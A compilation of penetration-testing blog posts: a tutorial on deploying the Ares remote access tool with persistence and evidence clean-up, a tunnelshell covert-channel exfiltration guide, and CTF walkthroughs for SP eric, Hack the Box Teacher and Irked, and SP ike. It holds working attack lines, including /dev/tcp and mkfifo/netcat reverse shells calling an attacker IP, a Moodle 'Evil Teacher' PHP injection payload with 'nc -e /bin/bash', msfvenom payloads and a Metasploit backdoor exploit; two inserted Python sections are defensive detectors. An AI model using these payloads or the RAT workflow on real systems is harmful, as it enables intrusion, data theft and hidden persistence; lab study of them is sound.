Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here


Command & Control: Ares


In this article, we will learn how to use Ares tool. This tool performs the Command and Control over the Web Interface. This tool can be found on GitHub.

Table of Content:

  • Introduction
  • Installation
  • Exploiting Target
  • Command Execution
  • Capturing Screenshot
  • File Download
  • Compressing Files
  • Persistence Agent
  • Clean Up

Introduction

Ares is a Python Remote Access Tool. Ares is made of two main programs: A Command & Control server, which is a Web interface to administer the agents and an agent program, which runs on the compromised host, and ensures communication with the CNC. The credit for creating this tool goes to Kevin Locati.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, we first need the tool on our attacker machine. To do this, we clone the tool directly from GitHub. After cloning, we traverse into the newly created directory called Ares using the cd command as shown in the image.

git clone https://github.com/sweetsoftware/Ares.git
cd Ares
ls

Now, to make the tool work, we need to install some prerequisites. Let’s start with the file named requirements.txt that we cloned earlier. This file lists the Python libraries that need to be installed.

pip install -r requirements.txt

Now as we have our target a Windows Machine, we will need to compile the agent that is compatible with the Windows Machine. To do that we will be needing wine. So, using the file that we cloned earlier, let’s begin the wine installation. Now this will take a bit of time.

ls
./wine_setup.sh

Exploiting Target

Now that we have successfully installed all the requirements needed to run the Ares tool, it’s time to gain the Command and Control session. To do this we need an agent. We use the cd command to traverse into the agent directory. After that, we list the contents of the directory and find a config file. We need to edit this file in order to gain the session.

cd agent/
ls
nano config.py

When we open the config file using the nano command, we see that the SERVER variable holds an IP address. We edit it and change it to the internal IP address of the attacker machine, which in my case is 192.168.1.4. No further changes are required, so save and exit the nano editor.

Now that we have configured the config file, it’s time to create an agent. As we have a Windows machine as a target, we create a Windows agent using the command given below.

./builder.py -p Windows --server http://192.168.1.4:8080 -o agent.exe

Now we send this agent to the target machine by whatever means we prefer. After that, we need to launch the server, since the agent will communicate with it. Let’s get back to the Ares directory. Here we have a sub-directory called server. After traversing into it, we have to initialise the database using the initdb parameter; this is only done the first time. Then we run the server as shown in the given image.

ls
cd server/
./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

 

Now we will open the server IP in our browser. Here we will see a form asking for the password as shown in the given image. We entered the password and clicked on Define to continue.

Now that the password is defined, we will have to enter the password to log in.

Here we have the main index of the Ares GUI. It has the following links: Change Password, Disconnect, Agent List. Now we go back to the step where we created an agent. Only after we execute the agent on the target machine do we get an entry in the Agent List.

As we can see in the image given below, we have an agent alive. We have the name of the agent, its status, the user that was logged in when the agent went live, and the hostname. We are also informed about the IP address and operating system of the target. If we ran the agent on multiple devices, each one of them would be visible here. We can select sessions from here and execute the same command on multiple sessions at the same time. We click on the name to proceed.

Command Execution

As Ares runs PowerShell commands, let’s start with the system information command. As we can see, we have all the system configuration information of the target machine.

systeminfo

Capturing Screenshot

Now, Let’s take a screenshot of the target machine. To do this we will type in the screenshot command and the agent will capture the screenshot and provide a link as shown in the figure. On opening this link the screenshot can be viewed.

screenshot

File Download

We can also download files from the remote target using this agent. To do this we require the name of the file. This can be obtained using the dir command. Now once we have the filename, we will download it to our local attacker machine as shown in the image given below.

download file.txt

Compressing Files

We can compress a directory on the remote target using the Ares agent. For this, we require the name of the directory. After we extract the name of the directory, we can compress the file remotely using the command given below. Here, we have ‘sample’ the name of the directory and ‘compressed.zip’ the name of the compressed file.

zip compressed.zip sample

 

Persistence Agent

We could invoke the persistence in the agent using the command persist. This command installs the agent on the remote target.

persist

Clean Up

This tool also performs the clean-up after the work through the session is done. This command removes the agent from the target machine, so it leaves nothing behind to be detected.

clean

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here



SP eric: Vulnhub Lab Walkthrough


Hello friends! Today we are going to take another CTF challenge known as “SP eric”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get 2 flags to complete the challenge.

They are located at:

/root/flag.txt

/home/eric/flag.txt

You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

  • Network scanning (Nmap)
  • Surfing HTTP service port
  • Enumerating directories using Dirb
  • Dumping git files using gitdumper
  • Extracting git file using Extractor
  • Enumerating for Login Credentials
  • Uploading PHP reverse shell
  • Getting user flag
  • Editing the file with a php shell
  • Getting the root flag

Walkthrough

We start the cracking of this CTF with a port scan using nmap. Through the nmap scan we find that port 80 is open. As we can see in the given image, the scan also discovered the .git directory.

nmap -A 192.168.1.18

By convention, if we have the port 80, we try and open the IP Address in the Web Browser. In doing so we see a message of “Blog under construction”. This seems like a Dead End. Let’s try another approach.

We ran a directory bruteforce using the dirb tool. This revealed the admin.php, index.php and a directory named “upload”. We will try to discover all these to enumerate as much as we can.

dirb http://192.168.1.18

On opening admin.php, we get a form with Username and Password fields. Seeing a form, our basic instinct was SQL injection. We spent a little time on that, then we took the advice of the author that there is no use in brute-forcing. We had to figure out some other way.

Now, back to the nmap scan we did in the beginning: we found a Git repository. After browsing a few sites on Google, we found this epic tool called GitTools. We cloned this tool onto our Desktop as shown in the given image. After that, we traversed into the GitTools directory using the cd command. Here, we found 3 tools: Dumper, Extractor and Finder. We use these tools to enumerate the git repository.

git clone https://github.com/internetwache/GitTools.git
cd GitTools/
ls

First, we traversed into the Dumper directory to use the gitdumper tool. This tool will dump all the files on the git. We will have to give a destination directory to use it. This tool can be used as shown in the given image.

./gitdumper.sh http://192.168.1.18/.git/ dest-dir

Now that we have successfully dumped the git files using the gitdumper tool, it’s time to use the Extractor tool. For this, we traverse inside the Extractor directory within GitTools. To use the extractor we have to give the path of the destination directory into which we dumped the git files using gitdumper.

./extractor.sh ../Dumper/dest-dir ./dest-dir

The Extractor tool creates directories based on the commits of the git repository we dumped earlier, as can be observed in the given image. Three directories were created in response to three commits. We traversed into the directory named “0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/” to find three files: admin.php, commit-meta.txt and index.php. We read the admin.php file using the cat command to find the username and password for the form we found earlier. We made a note of these credentials.

ls
cd 0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/
ls
cat admin.php

We went back to the admin form we discovered earlier and entered the login credentials we found in the git. This was a successful login. Upon logging in we found more forms, titled: Add new post and Add site to blogroll. Here, we found an Upload option. 

So, we entered the necessary information in the various fields on the page and selected a PHP reverse shell as the file to upload. After filling in all the entries, we clicked on the Add button to upload the file with this entry.

Even though the file was successfully uploaded, to get the session, we will have to execute the file on the target machine. Back to the nmap scan, we found a directory called “upload”. It’s time to get to that directory. We used the name of the php file we uploaded to execute the file on the target system as shown in the given image.

On the other side, in a new terminal, we started a netcat listener on the port that we set in the PHP reverse shell script. Upon execution, we got a shell on the target system. To get a proper shell, we used the Python one-liner. After getting the proper shell, we used the ls command to enumerate for the flag. We traversed into the eric directory. Here we found the 1st flag as shown in the given image. We also found a file named backup.sh. As we can see in the given image, the backup.sh file has all the permissions set and it runs as root.

nc -lvp 1234
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /home
ls -al
cd eric
ls -al
cat flag.txt

So, we have to target the backup.sh file to get the root shell on the target machine. We created a msfvenom script to exploit the target machine. We used the reverse_bash payload to create this script.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.4 lport=4455 R

We copied the script contents, then moved to the session we had on the target machine, and there we overwrote the backup.sh file with our script using the echo command.

echo "0<&171-;exec 171<>/dev/tcp/192.168.1.4/4455;sh <&171 >&171 2>&171" > backup.sh

cat backup.sh

On a new terminal, we started a netcat listener on the port that we specified while creating the script with msfvenom. When the backup.sh file ran, we got a root session. Being an improper shell, we improved it using the Python one-liner. Here, we traversed into the root directory, where we found the root flag as shown in the given image.

nc -lvp 4455
id
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /root
ls
cat flag.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here


Covert Channel: The Hidden Network


Attackers generally use a hidden network to evade firewalls and IDS. In this post, you will learn how information is stolen from a target machine through such an undetectable network. This type of network is known as a covert channel; it looks like generic traffic to any network monitoring device or application and to the network admin. It could be considered a form of steganography, but it is not exactly steganography. Two endpoint users can use a covert channel for communication that the network admin cannot detect.

Red teamers use covert channels for data exfiltration in red teaming operations over a legitimate network; data exfiltration is the process of secretly sharing data between two endpoints.

Table of Content

What is Covert channel

  • Type of covert channel

Covert channel attack using tunnelshell

  • What is Tunnelshell
  • Covert ICMP Channel
  • Covert HTTP Channel
  • Covert DNS Channel

What is the covert channel?

The word covert means “hidden or undetectable” and channel means “communication mode”, hence a covert channel denotes an undetectable channel of communication. This makes the transmission virtually undetectable by administrators or users, because it travels over a secret channel. It is essential to know the difference between encrypted communication and covert communication. In covert communication, the existence of the data stream itself is concealed from an unauthorized party. Encrypted communication, by contrast, does not hide the fact that communication has taken place; it only encrypts the data travelling between the two endpoints.

Type of covert channel

Storage covert channel: communicates by modifying a “storage location”, which allows the direct or indirect writing of a storage location by one process and the direct or indirect reading of it by another.

Timing covert channel: performs operations that affect the “real response time observed” by the receiver.

Note: The well-known Spectre and Meltdown attacks use a system’s page cache as their covert channel for exfiltrating data.

The Spectre and Meltdown attacks work by tricking your computer into caching privileged memory, through miscalculated speculative execution, a lack of privilege checking in out-of-order execution, and the power of the page cache. Once privileged memory is accessed, the processor caches the information and is then able to retrieve it from the cache, regardless of whether it is privileged information or not.

Read the complete article from here.

Covert Channel Attack Using Tunnelshell

It is possible to use almost any protocol to make a covert channel. The vast majority of covert channel research has been based on layer 3 (Network) and layer 4 (Transport) protocols such as ICMP, IP and TCP. Layer 7 (Application) protocols such as HTTP and DNS are also frequently used. This mechanism conveys information without alerting network firewalls and IDSs, and the channel is moreover not visible to netstat.

What is tunnelshell?

Tunnelshell is a program written in C for Linux users that works with a client-server paradigm. The server opens a /bin/sh that clients can access through a virtual tunnel. It works over multiple protocols, including TCP, UDP, ICMP and RawIP. Moreover, packets can be fragmented to evade firewalls and IDS.

Let’s go with practical for more details.

Requirement

  • Server (Kali Linux)
  • Client (Ubuntu18.04)
  • Tool for Covert Channel (Tunnelshell) which you can download from here.

Here, I’m assuming we already have a victim’s machine session through the c2 server. Now we need to create a hidden communication channel for data exfiltration, therefore, install tunnelshell on both endpoints.

Once you download it, then extract the file and compile it as shown below:

tar xvfz tunnelshell_2.3.tgz
make

Similarly, repeat the same steps at the other endpoint (the victim’s machine) and, after completion, execute the following command in the terminal to open the communication channel for the server (attacker).

sudo ./tunneld

By default, it sends fragmented packets, which are reassembled at the destination, to evade firewalls and IDS.

Now to connect with tunnelshell we need to execute the following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

Syntax: ./tunnel -i <session id (0-65535)> -d <delay in sending packets> -s <packet size> -t <tunnel type> -o <protocol> -p <port> -m <ICMP query> -a <ppp interface> <Victim’s IP>

./tunnel -t frag 10.10.10.2

frag: It uses IPv4 fragmented packets to encapsulate data. When some routers and firewalls (like Cisco routers and default Linux installations) receive fragmented packets without layer 4 headers, they let them pass even if they have a rule that denies them. As you can observe, it has successfully connected to 10.10.10.2 and we are able to access the shell of the victim’s machine.

As I said, if you check the network statistics using netstat, you will not see any process ID for tunnelshell. From the image given below, you can observe that with the help of the ps command I checked for the tunnelshell process and then tried to find its process ID through netstat.

ps | grep tunneld
netstat -ano

Let’s take a look at the network traffic generated between 10.10.10.1 (attacker’s IP) and 10.10.10.2 (victim’s IP) using Wireshark. The network flow looks generic between both endpoints, but if it is monitored properly, a network administrator can sniff the data packets. As you can observe, Wireshark has captured the covert traffic and sniffed the data that was travelling between the two endpoint devices.

Covert ICMP Channel

As we know, ping uses ICMP communication, with ICMP echo request and ICMP echo reply queries, to establish a connection between two hosts. Therefore, execute the command below:

sudo ./tunneld -t icmp -m echo-reply,echo

Now to connect with tunnelshell we need to execute the following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

./tunnel -t icmp -m echo-reply,echo 10.10.10.2

As you can observe that it is successfully connected to 10.10.10.2 and the attacker is able to access the shell of the victim’s machine.

Again, if you capture the traffic with Wireshark, you will notice ICMP echo request and reply packets travelling between both endpoints. And if you analyse these packets, you will be able to see what kind of payload is travelling as ICMP data.

Covert HTTP Channel

It establishes a virtual TCP connection without using a three-way handshake. It doesn’t bind any port, so you can use a port already in use by another process. Therefore, execute the command below:

sudo ./tunneld -t tcp -p 80,2000

Now to connect with tunnelshell we need to execute the following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

./tunnel -t tcp -p 80,2000 10.10.10.2

As you can observe that it is successfully connected to 10.10.10.2 and again attacker is able to access the shell of the victim’s machine.

On the other side, if you look at the network traffic, you will notice a TCP communication established without a three-way handshake between source and destination.

Covert DNS Channel 

To establish DNS covert channel, we need to run UDP tunnel mode on both endpoint machines. Therefore, execute the following command on the victim’s machine:

sudo ./tunneld -t udp -p 53,2000

Similarly, execute following on your (Attacker) machine to connect with a tunnel.

./tunnel -t udp -p 53,2000 10.10.10.2

As you can observe here, the malformed DNS packets contain the data travelling between both endpoint machines.

Conclusion: A covert channel does not encrypt the data packets it exfiltrates, so the traffic can easily be sniffed, and a network admin who monitors it can readily carry out data loss and risk management.
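The three sections above each leave a signature in the capture: echo request/reply packets whose data is not the usual ping pattern, TCP segments carrying data on a connection that never had a SYN, and UDP/53 datagrams that are not DNS. The following is an added example for this article, not part of tunnelshell, that checks packet summaries for exactly those three signs. The packets are constructed dicts standing in for what a pcap parser would emit, and the field names (proto, src, dst, sport, dport, flags, type, payload) are assumptions of this example.

```python
"""Heuristics for the three covert channels shown above, run over packet summaries.

Added example for this article; it is not part of tunnelshell. The packets are
constructed dicts standing in for what a pcap parser would produce, and the
field names (proto, src, dst, sport, dport, flags, type, payload) are
assumptions of this example.
"""

# Payload baselines for ordinary ping traffic (assumption: Linux iputils ping
# sends an 8-byte timestamp followed by the bytes 0x10..0x3f; Windows ping
# sends the fixed 32-byte alphabet string).
LINUX_PING_PATTERN = bytes(range(0x10, 0x40))
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def is_standard_ping_payload(payload):
    """True when an echo request/reply carries a normal ping payload."""
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    body = payload[8:]  # skip the Linux timestamp
    return len(body) > 0 and body == LINUX_PING_PATTERN[: len(body)]


def looks_like_dns(payload):
    """Minimal DNS header and question-section sanity check for UDP/53 datagrams."""
    if len(payload) < 12:
        return False
    qdcount = int.from_bytes(payload[4:6], "big")
    if not 1 <= qdcount <= 4:
        return False
    pos = 12
    for _ in range(qdcount):
        while True:  # walk the labels of one QNAME
            if pos >= len(payload):
                return False
            label_len = payload[pos]
            pos += 1
            if label_len == 0:
                break
            if label_len > 63 or pos + label_len > len(payload):
                return False  # over-long label, or a compression pointer in a query name
            pos += label_len
        if pos + 4 > len(payload):  # QTYPE and QCLASS must follow the name
            return False
        pos += 4
    return True


def analyze(packets):
    """Return (indicator, src, dst, detail) tuples for packets showing a covert-channel sign.

    The TCP check assumes the capture starts before the flows of interest, so
    a genuine connection's SYN is seen before its data segments.
    """
    findings = []
    handshaken = set()
    for p in packets:
        if p["proto"] == "tcp":
            flow = frozenset([(p["src"], p["sport"]), (p["dst"], p["dport"])])
            if "S" in p["flags"]:
                handshaken.add(flow)
            elif p["payload"] and flow not in handshaken:
                findings.append(("tcp-data-without-handshake", p["src"], p["dst"], p["dport"]))
        elif p["proto"] == "icmp" and p["type"] in (0, 8):
            if not is_standard_ping_payload(p["payload"]):
                findings.append(("icmp-echo-odd-payload", p["src"], p["dst"], len(p["payload"])))
        elif p["proto"] == "udp" and 53 in (p["sport"], p["dport"]):
            if not looks_like_dns(p["payload"]):
                findings.append(("udp53-not-dns", p["src"], p["dst"], len(p["payload"])))
    return findings


# Constructed traffic between the article's two hosts plus one benign client.
DNS_QUERY = (b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
             b"\x03www\x07example\x03com\x00\x00\x01\x00\x01")
SAMPLE_PACKETS = [
    {"proto": "icmp", "type": 8, "src": "10.10.10.1", "dst": "10.10.10.2",
     "payload": b"\x00" * 8 + LINUX_PING_PATTERN},                      # normal ping
    {"proto": "icmp", "type": 0, "src": "10.10.10.2", "dst": "10.10.10.1",
     "payload": b"uid=0(root) gid=0(root)\n"},                          # shell output in an echo reply
    {"proto": "tcp", "src": "10.10.10.5", "sport": 40000, "dst": "10.10.10.2", "dport": 80,
     "flags": "S", "payload": b""},                                     # real handshake
    {"proto": "tcp", "src": "10.10.10.5", "sport": 40000, "dst": "10.10.10.2", "dport": 80,
     "flags": "PA", "payload": b"GET / HTTP/1.1\r\n\r\n"},
    {"proto": "tcp", "src": "10.10.10.1", "sport": 2000, "dst": "10.10.10.2", "dport": 80,
     "flags": "PA", "payload": b"ls -la\n"},                            # data, but no SYN ever seen
    {"proto": "udp", "src": "10.10.10.5", "sport": 51000, "dst": "10.10.10.2", "dport": 53,
     "payload": DNS_QUERY},                                             # real query
    {"proto": "udp", "src": "10.10.10.1", "sport": 2000, "dst": "10.10.10.2", "dport": 53,
     "payload": b"cat /etc/passwd\n"},                                  # not DNS at all
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_PACKETS):
        print(finding)
```

None of these checks inspects the tunnelled commands themselves; they look only at protocol shape, which is what makes the traffic stand out once someone actually looks. The ICMP baseline is deliberately strict and will also flag legitimate tools that use custom echo payloads, so treat that indicator as a lead to confirm in the capture rather than a verdict.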

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Hack the Box: Teacher Walkthrough


Today we are going to solve another CTF challenge “Teacher”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of Teacher is 10.10.10.153

Penetrating Methodology

Scanning

  • Network Scanning (Nmap)

Enumeration

  • Web Spidering (dirb)
  • Abusing HTTP service
  • Password Fuzzing (Wfuzz)

Exploiting

  • Evil Teacher Attack
  • Obtain Netcat session
  • Get config.php to obtain the MySQL password
  • Connect to MySQL
  • Extract tables to obtain login credentials
  • Get user.txt

Privilege Escalation

  • Symlinking root directory
  • Get root.txt

Walkthrough

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sC -sV -p- 10.10.10.153

As you can observe, it shows that port 80 is open for HTTP services.

Exploring port 80, we found a school website, but I didn’t find a lot of information here. This website appears to be designed for online courses, and the author may have used some educational CMS to build it.

Enumeration

Since it is a learning site, it was presumably built for online classes on a CMS platform. Therefore, I went for web directory enumeration without wasting much time.

dirb http://10.10.10.153

If you look at the image below, you will find a web directory /moodle. The website is therefore confirmed to be built on the Moodle CMS; let’s explore it further.

When I explored http://10.10.10.153/moodle, it turned out to be the “Giovanni Chhatta” teacher portal for online classes in Mathematics Algebra. If you look for a Moodle exploit, you will see that it is vulnerable to SQL injection and RCE. So, to exploit it, we need to log in to this account, but we don’t have credentials.

While spidering, the photo gallery looked suspicious to me because each row contains 4 tiles and the photo in the top left corner is missing.

Therefore, I checked the source code of the page and found an error where picture 5 should be. We need to download this picture to learn more about the image error.

So, I downloaded this image 5 with the help of the wget command and identified the type of file.

wget http://10.10.10.153/images/5.png
file 5.png

Though it looks like an image, it was an ASCII file that we could open in any text editor. As you can see, with the help of the cat command I opened the 5.png file, where I found a password hint for the user “Giovanni”.

PASSWORD HINT: “I forgot the last character of my password. The only part I remembered is Th4C00lTheacha”

Since the password’s last character was missing, I created a wordlist with the command below.

crunch 15 15 -t Th4C00lTheacha^ -o pass.txt

Now let’s use wfuzz to brute-force the login with this wordlist and identify the valid combination.

wfuzz -w pass.txt -L 20 -d "username=giovanni&password=FUZZ" -hw 1224 http://10.10.10.153/moodle/login/index.php

WoW!! We got an HTTP 200 OK response for Giovanni: Th4C00lTheacha#

Exploiting

We got inside the dashboard with the help of the above login credentials. Now let’s try to exploit it; if you google for a Moodle exploit, it will show you the EVIL TEACHER attack, which you can read about here.

We now need to edit a new activity in order to exploit it, so explore settings > edit > add an activity or resource. Now you’re going to get a prompt to select an activity you want to add, I’ve chosen a quiz here.

Then click on Ethical hacking quiz to add some question inside it.

Click on Edit option for adding a question.

Now click on Add > + a new question which will open a console to add quiz question.

Choose “calculated” the question type to add.

Now, when you add a question, you need to enter the answer in the given text area, but this is vulnerable to the EVIL TEACHER attack. To get the reverse shell, we insert a formula in the text field provided for the answer and then click on save changes.

1?><?=log(1){a.`$_GET[0]`.({x})}?>

Start netcat on the local machine and then inject the netcat reverse shell payload in the URL as shown in the image, then click on next page:

nc -lvp 1234
&0(data;nc -e /bin/bash <attacker-IP> <listening port>)

Repeat the same to inject nc payload once again and execute the URL to get a netcat session.

&0(data;nc -e /bin/bash <attacker-IP> <listening port>)

You can see here that we pwned the target machine’s web shell, let’s explore more to get user.txt and root.txt. So, I check the directory list inside /moodle here that I found a config.php file.

I saw mysql login credential inside the config.php file as shown below.

Connect to MySQL to extract information from the database such as credentials for system login.

mysql -u root -p'Welkom1' moodle
show tables;

Here the mdl_user table looks most interesting; let’s extract its column information in the hope of finding something useful.

show columns from mdl_user;

WOW! WOW!! It includes a username column and a password column; let’s explore them.

select user,password from mdl_user;

Here I found 4 users with the md5 hash value, let’s try cracking them.

So, we got the password “expelled” by using an online MD5 lookup tool.

Now use the credentials above and switch user account to try to locate the user.txt file.

su giovanni
password: expelled
ls
cat user.txt

Yeah! Yeah. We got our 1st flag successfully, now let’s find out about root.txt, but as we know it needs an escalation of privilege.

Privilege Escalation

While traversing, I found a backup_course.tar file inside /home/giovanni/work/tmp.

Therefore, since the current directory has full permissions, I tried linking the root directory within the /tmp folder so that we get a backup of the root directory within the /tmp folder with the help of backup.sh.

ln -s /root tmp

Fantastic!! After 1-2 minutes I found the /root directory within /tmp, which means that without root access we can get the root.txt file as shown below.

cd /tmp
ls
cd /root
ls
cat root.txt

Booom!! We found root.txt successfully!!!!!!!!!!!
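Both this lab and SP eric above were rooted through the same class of mistake: a job that runs as root trusts a script or a working directory that unprivileged users can change (an editable backup.sh in SP eric; a world-writable tmp directory into which a symlink to /root could be dropped here). The following is an added example for this article, not part of either lab, showing the audit a system owner would run against such a job. The directory tree is constructed in a temporary directory so it runs offline, and the names backup.sh, tmp/ and courses/ are placeholders.

```python
"""Audit a job that root runs, for the two weaknesses these walkthroughs exploit:
a script that unprivileged users can edit (SP eric) and a working directory
in which a symlink can redirect the job at files outside it (Teacher).

Added example for this article, not part of either lab. The directory tree is
constructed in a temporary directory so the audit runs offline; the file
names (backup.sh, tmp/, courses/) are placeholders.
"""
import os
import stat
import tempfile


def writable_by_others(path):
    """True if the group or world write bit is set on the path itself (symlinks not followed)."""
    mode = os.lstat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def escaping_symlinks(directory):
    """Symlinks anywhere under directory whose target resolves outside it."""
    root = os.path.realpath(directory)
    found = []
    for dirpath, dirnames, filenames in os.walk(directory):  # does not descend into symlinks
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                target = os.path.realpath(full)
                if os.path.commonpath([root, target]) != root:
                    found.append((full, target))
    return found


def audit_job(script, workdir):
    """Return (finding, path) tuples; an empty list means the job passed."""
    findings = []
    if writable_by_others(script):
        findings.append(("writable-script", script))
    if writable_by_others(workdir):
        findings.append(("writable-workdir", workdir))
    for link, _target in escaping_symlinks(workdir):
        findings.append(("escaping-symlink", link))
    return findings


def remediate(script, workdir):
    """Minimal fix: owner-only write on script and workdir, drop links that leave the workdir."""
    os.chmod(script, 0o755)
    os.chmod(workdir, 0o755)
    for link, _target in escaping_symlinks(workdir):
        os.unlink(link)  # removes the link itself, never its target


def build_demo_tree():
    """Constructed fixture reproducing both weaknesses; returns (script, workdir)."""
    base = tempfile.mkdtemp(prefix="rootjob-")
    script = os.path.join(base, "backup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\n# placeholder for a backup job that root runs\n")
    os.chmod(script, 0o777)  # anyone can rewrite what root executes
    workdir = os.path.join(base, "tmp")
    os.makedirs(os.path.join(workdir, "courses"))
    os.chmod(workdir, 0o777)  # anyone can drop a symlink here
    os.symlink("/etc", os.path.join(workdir, "escape"))  # resolves outside workdir
    return script, workdir


if __name__ == "__main__":
    script, workdir = build_demo_tree()
    print("before:", audit_job(script, workdir))
    remediate(script, workdir)
    print("after: ", audit_job(script, workdir))
```

The permission check uses lstat so that a symlink planted where the script should be is judged by its own mode rather than its target’s, and the symlink check compares realpath results rather than link text, so relative links and links through other links are caught too. Run audit_job against the real script and directory a cron entry names, and in the job itself prefer tar’s default of archiving links rather than dereferencing them.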

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Hack the Box : Irked Walkthrough


Today we are going to solve another CTF challenge “irked”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of Irked is 10.10.10.117

Penetrating Methodology

  • Scanning
  • Enumerating
  • Exploiting
  • Get user.txt
  • Privilege Escalation
  • Get root.txt

Walkthrough

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -p- -sV 10.10.10.117 --open

As you can see, ports 22 and 80 are open for SSH and HTTP respectively, and some other ports for IRC (UnrealIRCd) are available.

Exploring port 80 gave us a frustrated emoji, as shown below, and a hint that IRC is working. This image might hold some hidden information, so I downloaded it and began to dig into it.

Enumeration

I tried to extract hidden information with the help of steghide, but it needs a passphrase for that. When this approach didn’t work, I searched for UnrealIRCd.

Exploiting

Fortunately, I found an exploit for UnrealIRCd in Metasploit. Although the default port for ircd is 6667, here it runs on 6697. After running the module, I pwned the victim machine successfully.

use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.13
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

So, as you can see, we’ve got a command session on the victim’s machine; let’s dig further to get user.txt and root.txt. First, to obtain a proper terminal, we spawn a pty shell with Python:

python -c 'import pty;pty.spawn("/bin/bash")'

I found user.txt within /home/djmardov/documents, but since we’re logged in as the ircd user, we have no permission to read this file. There was also a hidden .backup file, which gave us the password “UPupDOWNdownLRlrBAbaSSs”.

Earlier, the frustrated emoji image required a passphrase to extract the hidden text behind it. Using the password above as the passphrase, I extracted a pass.txt file from irked.jpg.

steghide extract -sf irked.jpg

Inside pass.txt I found another password: “Kab6h+m+bbp2J:HG”.

Privilege Escalation

Now I use the following credentials to connect to the victim’s machine through ssh.

Username: djmardov@10.10.10.117

Password: Kab6h+m+bbp2J:HG

First, I open the user.txt file and finish the first task with that. Now let’s dig further to find the root.txt file; for that we need to escalate privileges, so I look for any binaries with the SUID bit set.

ssh djmardov@10.10.10.117
cat user.txt
find / -perm -u=s -type f 2>/dev/null

Here /usr/bin/viewuser looks more interesting, let’s check it out.

When I ran the program, I found that it was developed to set and test user permissions, but it complained that it couldn’t find the listusers file within /tmp. The program therefore reads its data from /tmp/listusers, and that file is missing from the directory.

So what we can do is write a script that calls /bin/sh, save it as listusers inside /tmp, and then run viewuser so that it executes our script.

echo '/bin/sh' > /tmp/listusers
chmod 777 /tmp/listusers
/usr/bin/viewuser

Boom!! We have root access now, let’s grab the root.txt file and finish the assigned task.

cd /root
ls
cat root.txt

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box : Irked Walkthrough appeared first on Hacking Articles.

SP ike: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another CTF challenge known as “SP ike”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get flags to complete the challenge.

Security Level: Intermediate

Penetrating Methodology:

  • Discovering Targets IP
  • Network scanning (Nmap)
  • Surfing HTTP service port
  • Configuring HEXCHAT IRC Client
  • Connecting to IRC Server
  • Creating PHP Malicious Script using MSFvenom
  • Using Netcat Listener
  • Spawning TTY Shell
  • Getting Root Access
  • Reading Final Flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target: 192.168.1.21

Time to scan the target’s IP with nmap. The scan result shows four open ports: 80 (http), 139 (netbios-ssn), 445 (netbios-ssn) and 6667 (IRC).

nmap -sV -T4 192.168.1.21

Since port 80 is running HTTP, we browsed the target’s IP in our browser, but it was not of much help. Moving on.

Even directory scanning with the dirb tool was not very useful. That leaves the IRC chat server on port 6667, so we used the IRC client Hexchat to connect to it. First, we need to configure Hexchat by adding a new network profile and editing the connection details.

Now edit the network “ike” which we added and give it the target’s IP, as you can see in the image.

We have successfully connected to the IRC server, and we found something interesting: the server has a channel #php with a phpbot in it. I guess it wouldn’t be a problem for the phpbot to execute a PHP script.

We created an msfvenom script to exploit the target machine. We used the reverse_netcat payload to create this script.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.34 lport=1234 R

After a few tries, we were finally able to execute our PHP script successfully. To get a reverse shell, execute the script given below.

!php $s=array(); $p=array(); proc_open("mkfifo /tmp/tsglu; nc 192.168.1.34 1234 0</tmp/tsglu | /bin/sh >/tmp/tsglu 2>&1; rm /tmp/tsglu", $s, $p);

Oh Yeah!! We got the reverse shell, but it is not a proper shell, so we spawn a tty shell using python. After running sudo -l, we saw that nmap can be run with root privileges. So to get root, we used the commands shown in the image below and successfully got root access. Time to read the FLAG!!

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

